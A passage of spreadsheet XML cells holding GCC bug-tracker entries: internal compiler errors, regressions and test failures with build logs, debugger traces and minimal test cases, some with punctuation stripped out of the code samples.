RedHat Linux 6.0 w/ custom 2.2.16 kernel glibc-2.1.3 GNU binutils-000627 snapshot and GNU make 3.79</t>
  </si>
  <si>
    <t>tom.williams</t>
  </si>
  <si>
    <t>GCC-42748</t>
  </si>
  <si>
    <t>warnings about 'mangling of 'va_list' has changed in GCC 4.4' not suppressed in sytem headers</t>
  </si>
  <si>
    <t>see http://gcc.gnu.org/ml/gcc-patches/2010-01/msg00670.html and followups. seen on the gcc-4_4-branch and the trunk glibc version is eglibc-2.11.1
when running the libstdc++v3 testsuite on arm-linux-gnueabi a lot of test cases fail with excess errors e.g.
  FAIL: 17_intro/using_namespace_std_tr1_neg.cc (test for excess errors)
Excess errors:
In file included from /home/doko/gcc/4.4/gcc-4.4-4.4.2/build/arm-linux-gnueabi/libstdc++-v3/include/bits/basic_string.h:2562
                 from /home/doko/gcc/4.4/gcc-4.4-4.4.2/build/arm-linux-gnueabi/libstdc++-v3/include/string:53
                 from /home/doko/gcc/4.4/gcc-4.4-4.4.2/build/arm-linux-gnueabi/libstdc++-v3/include/bitset:49
                 from /home/doko/gcc/4.4/gcc-4.4-4.4.2/src/libstdc++-v3/testsuite/17_intro/using_namespace_std_tr1_neg.cc:23:
/home/doko/gcc/4.4/gcc-4.4-4.4.2/build/arm-linux-gnueabi/libstdc++-v3/include/ext/string_conversions.h: In instantiation of '_String __gnu_cxx::__to_xstring(int (*)(_CharT* size_t const _CharT* __va_list) size_t const _CharT* ...) [with _String = std::basic_string std::allocator &gt; _CharT = char]':
/home/doko/gcc/4.4/gcc-4.4-4.4.2/build/arm-linux-gnueabi/libstdc++-v3/include/bits/basic_string.h:2610:   instantiated from here
/home/doko/gcc/4.4/gcc-4.4-4.4.2/build/arm-linux-gnueabi/libstdc++-v3/include/ext/string_conversions.h:90: note: the mangling of 'va_list' has changed in GCC 4.4
http://launchpadlibrarian.net/37789038/buildlog_ubuntu-lucid-armel.gcc-snapshot_20100109-0ubuntu2_FULLYBUILT.txt.gz</t>
  </si>
  <si>
    <t>doko</t>
  </si>
  <si>
    <t>GCC-51871</t>
  </si>
  <si>
    <t>FAIL: gcc.c-torture/execute/20010122-1.c execution</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /te
st/gnu/gcc/gcc/gcc/testsuite/gcc.c-torture/execute/20010122-1.c   -w  -O0   -lm
  -o /test/gnu/gcc/objdir/gcc/testsuite/gcc/20010122-1.x0    (timeout = 300)
spawn /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /test/gnu/gcc/gc
c/gcc/testsuite/gcc.c-torture/execute/20010122-1.c -w -O0 -lm -o /test/gnu/gcc/o
bjdir/gcc/testsuite/gcc/20010122-1.x0
PASS: gcc.c-torture/execute/20010122-1.c compilation  -O0
Setting LD_LIBRARY_PATH to :/test/gnu/gcc/objdir/gcc::/test/gnu/gcc/objdir/gcc
spawn [open ...]
FAIL: gcc.c-torture/execute/20010122-1.c execution  -O0
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /test/gnu/gcc/objdir/gcc/testsuite/gcc/20010122-1.x0g
warning: Private mapping of shared library text was not specified
by the executable setting a breakpoint in a shared library which
is not privately mapped will not work.  See the HP-UX 11i v3 chatr
manpage for methods to privately map shared library text.
Breakpoint 1 main ()
    at /test/gnu/gcc/gcc/gcc/testsuite/gcc.c-torture/execute/20010122-1.c:180
180         abort ()
(gdb) p save_ret1[0]
$1 = (void *) 0x310b
(gdb) p save_ret1[1]
$2 = (void *) 0x318b
(gdb) p save_ret1[2]
$4 = (void *) 0x321b
# ./xgcc -B./ -v
Reading specs from ./specs
COLLECT_GCC=./xgcc
COLLECT_LTO_WRAPPER=./lto-wrapper
Target: hppa2.0w-hp-hpux11.11
Configured with: ../gcc/configure --with-arch=2.0 --with-gnu-as --with-as=/opt/gnu/bin/as --enable-shared --with-local-prefix=/opt/gnu --prefix=/opt/gnu/gcc/gcc-4.7 --with-gmp=/opt/gnu/gcc/gmp --enable-threads=posix --enable-debug=no --disable-nls --disable-lto --without-cloog --without-ppl --enable-languages=cc++objcfortranjavaadaobj-c++
Thread model: posix
gcc version 4.7.0 20120115 (experimental) [trunk revision 183192] (GCC)</t>
  </si>
  <si>
    <t>GCC-49355</t>
  </si>
  <si>
    <t>new T({}) crashes G++ when struct T { std::string foobar }</t>
  </si>
  <si>
    <t>Created attachment 24482
Minimal test case producing the (un)desired behavior and temporary files.
The following code:
#include 
struct T {
	std::string foobar
}
T* x = new T({})
Produces the following behavior:
peter@magma:~/tmp/a$ g++ --version
g++ (Ubuntu 4.4.1-4ubuntu9) 4.4.1
Copyright (C) 2009 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
peter@magma:~/tmp/a$ g++ -Wall -Wextra test_case.cpp 
test_case.cpp:9: warning: extended initializer lists only available with -std=c++0x or -std=gnu++0x
test_case.cpp:9: warning: extended initializer lists only available with -std=c++0x or -std=gnu++0x
test_case.cpp: In function â€˜void __static_initialization_and_destruction_0(int int)â€™:
test_case.cpp:9: internal compiler error: in lower_stmt at gimple-low.c:408
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I listed the affected version as 4.7.0 because when I went on IRC I was informed by a user there that 4.7.0 20110524 (experimental) [trunk revision 174141] is still affected.
System information:
peter@magma:~$ uname -a
Linux magma 2.6.31-23-generic #75-Ubuntu SMP Fri Mar 18 18:16:06 UTC 2011 x86_64 GNU/Linux
peter@magma:~$ cat /etc/issue
Ubuntu 9.10 \n \l
Attached is the code and the temps.</t>
  </si>
  <si>
    <t>peter.schmidt-nielsen</t>
  </si>
  <si>
    <t>GCC-3010</t>
  </si>
  <si>
    <t>ld:libgcc.map: file format not recognized treating as linker script</t>
  </si>
  <si>
    <t>I'm trying to build the  latest snapshot for gcc-3.0 20010528 and am getting the above error message from the GNU ld 2.11 command.
Release:
GNU ld version 2.11 (with BFD 2.11)/sparc solaris2.8/gcc version 2.95.2 19991024 (release)
Environment:
GNU ld version 2.11 (with BFD 2.11)
sparc solaris2.8
gcc version 2.95.2 19991024 (release)</t>
  </si>
  <si>
    <t>george.goffe</t>
  </si>
  <si>
    <t>GCC-34098</t>
  </si>
  <si>
    <t>xgcc: Internal error: Segmentation fault (program gnat1)</t>
  </si>
  <si>
    <t>/test/gnu/gcc/objdir/./prev-gcc/xgcc -B/test/gnu/gcc/objdir/./prev-gcc/ -B/opt/g
nu/gcc/gcc-4.3.0/hppa2.0w-hp-hpux11.11/bin/ -c -g -O2 -mdisable-indexing     -gn
atpg -gnata -nostdinc -I- -I. -Iada -I../../gcc/gcc/ada ../../gcc/gcc/ada/ada.ad
s -o ada/ada.o
xgcc: Internal error: Segmentation fault (program gnat1)
Please submit a full bug report.
See  for instructions.
make[3]: *** [ada/ada.o] Error 1
This occurs in stage2 with
-bash-3.2$ ./xgcc -B./ -v
Reading specs from ./specs
Target: hppa2.0w-hp-hpux11.11
Configured with: ../gcc/configure --with-gnu-as --with-as=/opt/gnu/bin/as --enable-shared --disable-nls --with-local-prefix=/opt/gnu --prefix=/opt/gnu/gcc/gcc-4.3.0 --enable-debug=no --enable-threads=posix --with-mpfr=/opt/gnu/gcc/gcc-4.3.0 --with-gmp=/opt/gnu/gcc/gcc-4.3.0 --disable-libmudflap --enable-languages=cc++objcobj-c++fortranjavaada
Thread model: posix
gcc version 4.3.0 20071114 (experimental) [trunk revision 130173] (GCC)
# gdb /test/gnu/gcc/objdir/./prev-gcc/gnat1
GNU gdb 6.6
Copyright (C) 2006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hppa2.0w-hp-hpux11.11...
Breakpoint 1 at 0x571448: file ../../gcc/gcc/diagnostic.c line 660.
Breakpoint 2 at 0x5712b4: file ../../gcc/gcc/diagnostic.c line 604.
Breakpoint 3 at 0xf2fa54: file ../../gcc/libiberty/obstack.c line 402.
Breakpoint 4 at 0xf2dac0: file ../../gcc/libiberty/hashtab.c line 446.
(gdb) set args -I- -I. -Iada -I../../gcc/gcc/ada -quiet -nostdinc -dumpbase ada.ads -O2 -g -mdisable-indexing -gnatpg -gnata -gnatO ada/ada.o ../../gcc/gcc/ada/ada.ads -o xxx.s
(gdb) r
Starting program: /test/gnu/gcc/objdir/prev-gcc/gnat1 -I- -I. -Iada -I../../gcc/gcc/ada -quiet -nostdinc -dumpbase ada.ads -O2 -g -mdisable-indexing -gnatpg -gnata -gnatO ada/ada.o ../../gcc/gcc/ada/ada.ads -o xxx.s
warning: The shared libraries were not privately mapped setting a
breakpoint in a shared library will not work until you rerun the program.
Breakpoint 3 at 0xc002b618
Breakpoint 3 at 0x7af827fc
Breakpoint 4 at 0x7afe6688
Program received signal SIGSEGV Segmentation fault.
0x00ef2ee0 in linemap_lookup (set=0x7aedc000 line=2)
    at ../../gcc/libcpp/line-map.c:282
282       if (line &gt;= cached-&gt;start_location)
(gdb) bt
#0  0x00ef2ee0 in linemap_lookup (set=0x7aedc000 line=2)
    at ../../gcc/libcpp/line-map.c:282
#1  0x0088f9ac in expand_location (loc=2) at ../../gcc/gcc/tree.c:3406
#2  0x0055d008 in dbxout_finish_complex_stabs (sym=0x7adf60d0 code=N_LSYM
    addr=0x0 label=0x0 number=0) at ../../gcc/gcc/dbxout.c:848
Backtrace stopped: frame did not save the PC
(gdb) p cached
$1 = (const struct line_map *) 0x0</t>
  </si>
  <si>
    <t>GCC-4011</t>
  </si>
  <si>
    <t>compiler reports internal error</t>
  </si>
  <si>
    <t xml:space="preserve">compiler aborts in the following situation: an attribute is present in a class declaration immediately after the keyword class and that class has parents. (Without parents no error occured.)
Release:
GCC 3.0 and 3.0.1 20010626 (prerelease)
Environment:
GCC 3.0 Windows
also checked with gcc version 3.0.1 20010626 (prerelease)
(using codesourcery online test facility) with the same results)
How-To-Repeat:
class ca {  }
class __attribute__ ((any)) cb : public ca {  } </t>
  </si>
  <si>
    <t>aek</t>
  </si>
  <si>
    <t>GCC-33152</t>
  </si>
  <si>
    <t>Initialization/declaration problems in block data</t>
  </si>
  <si>
    <t>The following four variants of declarations have been tried in a block 
 data statement with gfortran 4.1.3 and partly also with 4.3.0: 
 Var. 1: 
 character(len=3) :: emname(nmin)=(/'bar''baz'/) 
 common/nmstr/emname 
 gives this error: 
  In file test.f90:16 
 common/nmstr/emname 
                   1 
 Error: Previously initialized symbol 'emname' in COMMON block 'nmstr' 
 at (1) 
Var. 2: 
 common/nmstr/emname 
 character(len=3) :: emname(nmin)=(/'bar''baz'/) 
 gives this error: 
  In file test.f90:19 
 character(len=3) :: emname(nmin)=(/'bar''baz'/) 
                                                1 
 Error: Initializer not allowed for COMMON variable 'emname' at (1) 
  In file test.f90:16 
 common/nmstr/emname 
                   1 
 Error: Symbol 'emname' at (1) has no IMPLICIT type 
Var. 3: 
 common/nmstr/emname 
 data emname/'bar''baz'/ 
 character(len=3) :: emname(nmin) 
gives this error: 
 test.f90:1: internal compiler error: in check_data_variable at 
 fortran/resolve.c:5865 
 Please submit a full bug report 
 with preprocessed source if appropriate. 
Var. 4: 
 character(len=3) :: emname(nmin) !=(/'bar''baz'/) 
 common/nmstr/emname 
 data emname/'bar''baz'/ 
works. 
My question is this: I thought all four variants are compliant with the standard. Which ones are possibly not and where does gfortran indeed have a bug? Var. 1 worked with the Intel compiler I didn't/can't test the others. The complete test program is below (comment/uncomment some lines as applicable). My system is SUSE Linux 10.2.
program foo 
 implicit none 
 integer parameter :: nmin=2 
 double precision :: rho0(nmin) 
 common/phasedat/rho0 
end program foo 
block data thdinit 
 implicit none 
 integer parameter :: nmin=2 
 !double precision :: rho0(nmin) 
 common/phasedat/rho0 
 double precision :: rho0(nmin) 
 character(len=3) :: emname(nmin) !=(/'bar''baz'/) 
 common/nmstr/emname 
 data emname/'bar''baz'/ 
 !character(len=3) :: emname(nmin)=(/'bar''baz'/) 
 end block data thdinit</t>
  </si>
  <si>
    <t>jvdelisle</t>
  </si>
  <si>
    <t>ruedas</t>
  </si>
  <si>
    <t>GCC-43156</t>
  </si>
  <si>
    <t>[4.5 Regression] SPU-elf ICEs on simple programs</t>
  </si>
  <si>
    <t>As mentioned here:
http://gcc.gnu.org/ml/gcc-patches/2010-02/msg00780.html
Just building a simple: int main(void) { return 0 }
ICEs at -O1 or -O2.  This ICEs as we call add_reg_note with an insn note:
(note 21 12 22 2 NOTE_INSN_DELETED)
And REG_NOTES causes the next insn rtx gets modified for some reason.</t>
  </si>
  <si>
    <t>GCC-28096</t>
  </si>
  <si>
    <t>[4.2 regression] fdlibm/strtod.c miscompiled at -O2</t>
  </si>
  <si>
    <t>It seems that converting Double/Float -&gt; String -&gt; Double/Float doesn't preserve the value for small values.
The following test:
class j {
  public static void main(String [] v) throws NumberFormatException {
    System.out.println(Double.MIN_VALUE =  + Double.MIN_VALUE)
    System.out.println(Float.MIN_VALUE =  + Float.MIN_VALUE)
    System.out.println(String Double.MIN_VALUE =  +
         Double.parseDouble(Double.toString(Double.MIN_VALUE)))
    System.out.println(String Float.MIN_VALUE =  +
         Float.parseFloat(Float.toString(Float.MIN_VALUE)))
  }
}
With Cacao it generates:
Double.MIN_VALUE = 4.9E-324
Float.MIN_VALUE = 1.4E-45
String Double.MIN_VALUE = 5.0E-324
String Float.MIN_VALUE = 1.4012985E-45
With Sun JDK 1.4 it generates:
Double.MIN_VALUE = 4.9E-324
Float.MIN_VALUE = 1.4E-45
String Double.MIN_VALUE = 4.9E-324
String Float.MIN_VALUE = 1.4E-45</t>
  </si>
  <si>
    <t>GCC-5239</t>
  </si>
  <si>
    <t>Stepanov Abstraction Penalty regression from 2.95.3 -finline-functions</t>
  </si>
  <si>
    <t>We are seeing poor results for tests 5-12 in the Stpanov benchmark relative to 2.95.3.
Results with gcc-3.0.3 using -O2 -finline-functions:
Total absolute time: 57.68 sec
Abstraction Penalty: 4.46
Results with gcc-2.95.3 using -O2 -finline-functions:
Total absolute time: 8.25 sec
Abstraction Penalty: 0.99
Results with gcc-3.0.3 using -O2:
Total absolute time: 8.28 sec
Abstraction Penalty: 1.01
Here is the innermost loop for test #5 with -finline-functions:
.L66:
        fstpt   XMMWORD PTR [%ebp-72]
        push    %ecx
        push    0
        push    %eax
        push    %esi
.LCFI33:
        call    _ZN16reverse_iteratorIPddEppEi
        lea     %edx [%ebp-32]
        fldt    XMMWORD PTR [%ebp-72]
        mov     %eax DWORD PTR [%ebp-28]
        add     %esp 12
        cmp     DWORD PTR [%ebp-32] %ebx
        faddl   QWORD PTR [%eax-8]
        mov     %eax %edx
        jne     .L66
and without -finline-functions the innermost loop is:
.L60:
        lea     %edx [%eax-8]
        faddl   QWORD PTR [%eax-8]
        cmp     %edx %ecx
        mov     %eax %edx
        jne     .L60
Release:
gcc-3.0.3
Environment:
i586-pc-linux-gnu
How-To-Repeat:
compile with -O2 -finline-functions</t>
  </si>
  <si>
    <t>GCC-44030</t>
  </si>
  <si>
    <t>[4.6 Regression] error: SSA name in freelist but still referenced</t>
  </si>
  <si>
    <t>[regehr@bethe tmp601]$ current-gcc -v
Using built-in specs.
COLLECT_GCC=current-gcc
COLLECT_LTO_WRAPPER=/uusoc/exports/scratch/regehr/z/compiler-install/gcc-r159144-install/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --with-libelf=/usr/local --enable-lto --prefix=/home/regehr/z/compiler-install/gcc-r159144-install --program-prefix=r159144- --enable-languages=cc++
Thread model: posix
gcc version 4.6.0 20100507 (experimental) (GCC) 
[regehr@bethe tmp601]$ current-gcc -O2 -c small.c
small.c: In function 'func':
small.c:14:1: error: SSA name in freelist but still referenced
pretmp.6_10
small.c:24:7: note: in statement
g_54.1_5 = pretmp.6_10
small.c:14:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[regehr@bethe tmp601]$ cat small.c
typedef int int32_t
typedef unsigned int uint32_t
static uint32_t
safe_sub_func_uint32_t_u_u (uint32_t ui1 uint32_t ui2)
{
  return ui1 - ui2
}
int32_t l_105[7]
int32_t g_4
int32_t *g_54 = 
int32_t *
func (int32_t p_73 int32_t * p_74 int32_t p_75 int32_t * *p_76
      int32_t * *p_77)
{
lbl_110:for (g_4 = 0 g_4 g_4 = 1)
    {
    }
  for (p_75 = -28 p_75 p_75 = safe_sub_func_uint32_t_u_u (p_75 1))
    {
      if (g_4)
	goto lbl_110
      *g_54 = 0
    }
  return 
}</t>
  </si>
  <si>
    <t>regehr</t>
  </si>
  <si>
    <t>GCC-81859</t>
  </si>
  <si>
    <t>[8 Regression] valgrind error from warn_about_normalization</t>
  </si>
  <si>
    <t>For the C testsuite file c-c++-common/cpp/normalize-3.c
a valgrind build of trunk gcc revision 251105 does this:
c-c++-common/cpp/normalize-3.c:5:1: error: unknown type name â€˜Âªâ€™
 \u00AA
 ^~~~~~
==24049== Conditional jump or move depends on uninitialised value(s)
==24049==    at 0x4C31B98: strlen (vg_replace_strmem.c:458)
==24049==    by 0x112A520: pp_format(pretty_printer* text_info*) (pretty-print.
c:676)
==24049==    by 0x112322E: diagnostic_report_diagnostic(diagnostic_context* dia
gnostic_info*) (diagnostic.c:974)
==24049==    by 0x61977A: c_cpp_error(cpp_reader* int int rich_location* cha
r const* __va_list_tag (*) [1]) (c-common.c:6128)
==24049==    by 0x1139A20: cpp_diagnostic_with_line(cpp_reader* int int unsig
ned int unsigned int char const* __va_list_tag (*) [1]) (errors.c:174)
==24049==    by 0x1139DE8: cpp_warning_with_line(cpp_reader* int unsigned int
 unsigned int char const* ...) (errors.c:210)
==24049==    by 0x1142B97: warn_about_normalization(cpp_reader* cpp_token const
* normalize_state const*) [clone .isra.11] [clone .part.12] (lex.c:1310)
==24049==    by 0x114521C: warn_about_normalization (lex.c:2916)
Revision 250947 doesn't have this problem so it looks new to me.</t>
  </si>
  <si>
    <t>GCC-15181</t>
  </si>
  <si>
    <t>gfc_conv_component_ref: Assertion `c-&gt;backend_decl' failed</t>
  </si>
  <si>
    <t>cvs-head tree-ssa gfortran (gcc version 3.5-tree-ssa 20040423 (merged 20040414))
fails to compile this code. It works fine with Absoft and ICC.
module foo
  implicit none
  type:: wire_type
     integer iwire
  end type wire_type
  type:: tdc_type   
     integer iabc
     type(wire_type) pointer:: wireP
  end type tdc_type
  type(tdc_type):: pctdc(100)
contains
  subroutine bar
    integer ii
    integer itdc
    !! following line causes ICE:
    !! f951: ../../gcc/gcc/fortran/trans-expr.c:219:
    !! gfc_conv_component_ref: Assertion `c-&gt;backend_decl' failed.
    ii = PCtdc(iTDC)%WireP%iwire
  end subroutine bar
end module foo
[olchansk@dork gfortran_test]$ make test_gfc_conv_component_ref.o
/triumfcs/trshare/olchansk/gcc-tree-ssa/install/bin/gfortran -x f95 -c  -o
test_gfc_conv_component_ref.o -O2 -g -Wall -Waliasing -Wline-truncation
-Wsurprising -Wunused-labels -fPIC -ffixed-line-length-132
test_gfc_conv_component_ref.f90
f951: ../../gcc/gcc/fortran/trans-expr.c:219: gfc_conv_component_ref: Assertion
`c-&gt;backend_decl' failed.
test_gfc_conv_component_ref.f90: In function `bar':
test_gfc_conv_component_ref.f90:25: internal compiler error: Aborted
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [test_gfc_conv_component_ref.o] Error 1
K.O.</t>
  </si>
  <si>
    <t>olchansk</t>
  </si>
  <si>
    <t>GCC-35881</t>
  </si>
  <si>
    <t>libgomp</t>
  </si>
  <si>
    <t>OMP wrong results for omp_get_max_threads</t>
  </si>
  <si>
    <t>The following test program returns 1 for omp_get_max_threads in a parallel region. This is different from what I get with three other compilers and hence somewhat unexpected. Is this correct and if so should it be the default?
&gt; gfortran -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: /data03/vondele/gcc_4_3_0_release/gcc-4.3.0/configure --prefix=/ext/software/64/gfortran-suite/gcc-4.3.0 --enable-languages=cc++fortran
Thread model: posix
gcc version 4.3.0 (GCC)
SUBROUTINE TEST()
   IMPLICIT NONE
   INTEGER :: ithreadnthreadmthread
!$ INTEGER :: omp_get_thread_num omp_get_max_threads omp_get_num_threads
   ithread=0
   nthread=1
   mthread=1
!$ nthread=omp_get_max_threads()
   write(6*) ithreadnthreadmthread
!$OMP PARALLEL PRIVATE(ithreadnthreadmthread)
!$ nthread=omp_get_max_threads()
!$ mthread=omp_get_num_threads()
!$ ithread=omp_get_thread_num()
!$OMP CRITICAL
   write(6*) ithreadnthreadmthread
!$OMP END CRITICAL
!$OMP END PARALLEL
END SUBROUTINE TEST
CALL TEST()
END
IBM:
vondele@blanc161:~&gt; xlf90_r -qsuffix=f=f90 -O3 -qsmp=omp test.f90
** test   === End of Compilation 1 ===
** _main   === End of Compilation 2 ===
1501-510  Compilation successful for file test.f90.
vondele@blanc161:~&gt; ./a.out
 0 4 1
 0 4 4
 1 4 4
 3 4 4
 2 4 4
vondele@pcihopt3:/data03/vondele/openmp&gt; pgf90 -openmp test.f90
vondele@pcihopt3:/data03/vondele/openmp&gt; ./a.out
           0           4           1
           0           4           4
           1           4           4
           2           4           4
           3           4           4
vondele@pcihopt3:/data03/vondele/openmp&gt; ifort -O0 -openmp test.f90
test.f90(13): (col. 7) remark: OpenMP DEFINED REGION WAS PARALLELIZED.
vondele@pcihopt3:/data03/vondele/openmp&gt; ./a.out
           0           4           1
           0           4           4
           1           4           4
           2           4           4
           3           4           4
vondele@pcihopt3:/data03/vondele/openmp&gt; gfortran  -O0 -fopenmp test.f90
vondele@pcihopt3:/data03/vondele/openmp&gt; ./a.out
           0           4           1
           0           1           4
           1           1           4
           2           1           4
           3           1           4</t>
  </si>
  <si>
    <t>GCC-48676</t>
  </si>
  <si>
    <t>[sh] Unaligned userspace access in gcc.dg/torture/pr37868.c</t>
  </si>
  <si>
    <t>Hi
When we test gcc.dg/torture/pr37868.c on SH we got unaligned userspace access.
This accesses it in the address where SH cannot access.
I could confirm this with gcc-4.4 4.5 4.6 and  4.7.
Please set it to skip in the case of sh.</t>
  </si>
  <si>
    <t>iwamatsu</t>
  </si>
  <si>
    <t>GCC-53821</t>
  </si>
  <si>
    <t>[4.7/4.8 regression][c++11] multiple definitions of lambda</t>
  </si>
  <si>
    <t>this is a regression as not happening in 4.6.2 and 4.7.1
I personally think that the template methods SHOULD be declared inline if included in multiple sourcesâ€¦
anyhow since it was discussed at length  in PR53780 and PR53768
and got attention from developers I promised to reduce and post
cat inlT.cc
#include 
template struct Foo {
   virtual int bar(intint)
   int k
}
// int ebar(intint) __attribute__ ((visibility (default)))
template 
int Foo::bar(int i int j) {
  auto ebar = [](int a int b) { return a+b}
  static int a=i
  if (i&gt;0) k = ebar(ij)
  if (j&gt;0) k = ebar(ji)
  if (i&gt;0) k = ebar(ji)
  if (k&gt;0) k = ebar(ij)
  return (a==i) ? i : j
}
struct A1 {
  Foo * foo
}
int __attribute__ ((visibility (default)))  hello1 (int i int j) { A1 a return a.foo-&gt;bar(ij)} 
[vocms123] ~/public/ctest/bugs48 $ cat inlT2.cc
#include 
template struct Foo {
   virtual int bar(intint)
   int k
}
// int ebar(intint) __attribute__ ((visibility (default)))
template 
int Foo::bar(int i int j) {
  auto ebar = [](int a int b) { return a+b}
  static int a=i
  if (i&gt;0) k = ebar(ij)
  if (j&gt;0) k = ebar(ji)
  if (i&gt;0) k = ebar(ji)
  if (k&gt;0) k = ebar(ij)
  return (a==i) ? i : j
}
struct A2 {
  Foo * foo
}
int __attribute__ ((visibility (default)))  hello2 (int i int j) { A2 a return a.foo-&gt;bar(ij)} 
[vocms123] ~/public/ctest/bugs48 $ cat buildInlT
c++ -std=gnu++11 -O2 -fvisibility-inlines-hidden -fvisibility=hidden -flto -c inlT.cc  -fPIC
c++ -std=gnu++11 -O2 -fvisibility-inlines-hidden -fvisibility=hidden -flto -c inlT2.cc -fPIC
c++ -std=gnu++11 -O2 -fvisibility-inlines-hidden -fvisibility=hidden -flto -shared inlT.o inlT2.o -fPIC -o inlT.so
source buildInlT
/afs/cern.ch/user/i/innocent/w3/gcc47slc5/bin/ld: error: inlT2.o: multiple definition of 'Foo::bar(int int)::{lambda(int int)#1}::_FUN(int int)'
/afs/cern.ch/user/i/innocent/w3/gcc47slc5/bin/ld: inlT.o: previous definition here
/afs/cern.ch/user/i/innocent/w3/gcc47slc5/bin/ld: error: inlT2.o: multiple definition of 'Foo::bar(int int)::{lambda(int int)#1}::operator int (*)(int int)() const'
/afs/cern.ch/user/i/innocent/w3/gcc47slc5/bin/ld: inlT.o: previous definition here
collect2: error: ld returned 1 exit status
also with simpler
cat buildInlT0
c++ -std=gnu++11 -O2    -c inlT.cc  -fPIC
c++ -std=gnu++11 -O2    -c inlT2.cc -fPIC
c++ -std=gnu++11 -O2    -shared inlT.o inlT2.o -fPIC -o inlT.so
 source buildInlT0
/afs/cern.ch/user/i/innocent/w3/gcc47slc5/bin/ld: error: inlT2.o: multiple definition of 'Foo::bar(int int)::{lambda(int int)#1}::_FUN(int int)'
/afs/cern.ch/user/i/innocent/w3/gcc47slc5/bin/ld: inlT.o: previous definition here
/afs/cern.ch/user/i/innocent/w3/gcc47slc5/bin/ld: error: inlT2.o: multiple definition of 'Foo::bar(int int)::{lambda(int int)#1}::operator int (*)(int int)() const'
/afs/cern.ch/user/i/innocent/w3/gcc47slc5/bin/ld: inlT.o: previous definition here
c++ -v
Using built-in specs.
COLLECT_GCC=c++
COLLECT_LTO_WRAPPER=/afs/cern.ch/user/i/innocent/w3/gcc47slc5/libexec/gcc/x86_64-unknown-linux-gnu/4.7.2/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.7/configure --enable-languages=cc++fortran --disable-multilib --enable-gold=yes --disable-nls --enable-lto --with-mpc=/afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0 --with-gmp=/afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0 --with-mpfr=/afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0 --prefix=/afs/cern.ch/user/i/innocent/w3/gcc47slc5 --with-build-time-tools=/build/ge/new-binutils/a/slc5_amd64_gcc470/external/gcc/4.7.0-cms/bin
Thread model: posix
gcc version 4.7.2 20120629 (prerelease) [gcc-4_7-branch revision 189081] (GCC) 
[vocms123] ~/public/ctest/bugs48 $ ld -v
GNU gold (GNU Binutils 2.22.52.20120515) 1.11</t>
  </si>
  <si>
    <t>vincenzo.innocente</t>
  </si>
  <si>
    <t>GCC-53889</t>
  </si>
  <si>
    <t>Gthreads doesn't support destroying recursive mutexes</t>
  </si>
  <si>
    <t>There is no __gthread_recursive_mutex_destroy function in the gthreads API.
Using __gthread_mutex_destroy fails to compile on platforms where the mutex types are different. This means to avoid resource leaks libstdc++ needs to hack around it with:
    // FIXME: gthreads doesn't define __gthread_recursive_mutex_destroy
    // so we need to obtain a __gthread_mutex_t to destroy
  private:
    template
      static void
      _S_destroy_win32(_Mx* __mx _Rm const* __rmx)
      {
        __mx-&gt;counter = __rmx-&gt;counter
        __mx-&gt;sema = __rmx-&gt;sema
        __gthread_mutex_destroy(__mx)
      }
    // matches a gthr-win32.h recursive mutex
    template
      static typename __enable_if::__type
      _S_destroy(_Rm* __mx)
      {
        __gthread_mutex_t __tmp
        _S_destroy_win32(
      }
    // matches a recursive mutex with a member 'actual'
    template
      static typename __enable_if::__type
      _S_destroy(_Rm* __mx)
      { __gthread_mutex_destroy( }
    // matches when there's only one mutex type
    template
      static typename
      __enable_if::__value
        void&gt;::__type
      _S_destroy(_Rm* __mx)
      { __gthread_mutex_destroy(__mx) }
Gthreads should define __gthread_recursive_mutex_destroy</t>
  </si>
  <si>
    <t>GCC-56657</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE - error: unrecognizable insn.</t>
  </si>
  <si>
    <t>Created attachment 29693
Test case.
I got this ICE when cross-building UFRaw (http://ufraw.sourceforge.net) for Windows using MXE (http://mxe.cc). I have tried GCC 4.7.2 4.7.0 4.6.3 and 4.6.0. All crash with the same error. GCC 4.5.4 works.
The output is:
  CC     ufraw_writer.o
ufraw_writer.c: In function 'ufraw_write_image':
ufraw_writer.c:790:1: error: unrecognizable insn:
(insn 214 213 215 19 (set (mem/v/f/c:SI (plus:SI (reg/f:SI 54 virtual-stack-vars)
                (const_int -656 [0xfffffffffffffd70])) [2 out+0 S4 A64])
        (const:SI (plus:SI (symbol_ref:SI (_iob) [flags 0x440] )
                (const_int 32 [0x20])))) ufraw_writer.c:334 -1
     (nil))
ufraw_writer.c:790:1: internal compiler error: in extract_insn at recog.c:2123
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: *** [ufraw_writer.o] Error 1
I have attached a small test case which also shows the error compiled with 'i686-pc-mingw32-g++ -c insn.cc' (it happens for both c and c++ code):
insn.cc: In function 'void f()':
insn.cc:3:29: error: unrecognizable insn:
(insn 8 7 9 3 (set (mem/v/f/c:SI (symbol_ref:SI (_ZL2fd) [flags 0x2] ) [0 fd+0 S4 A32])
        (const:SI (plus:SI (symbol_ref:SI (_iob) [flags 0x440] )
                (const_int 32 [0x20])))) insn.cc:3 -1
     (nil))
insn.cc:3:29: internal compiler error: in extract_insn at recog.c:2123
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Best regards
Niels Kristian Bech Jensen</t>
  </si>
  <si>
    <t>nkbj1970</t>
  </si>
  <si>
    <t>GCC-46277</t>
  </si>
  <si>
    <t>[4.6 Regression] Revision 166167 failed to build 252.eon in SPEC CPU 2000</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 166167:
http://gcc.gnu.org/ml/gcc-cvs/2010-11/msg00053.html
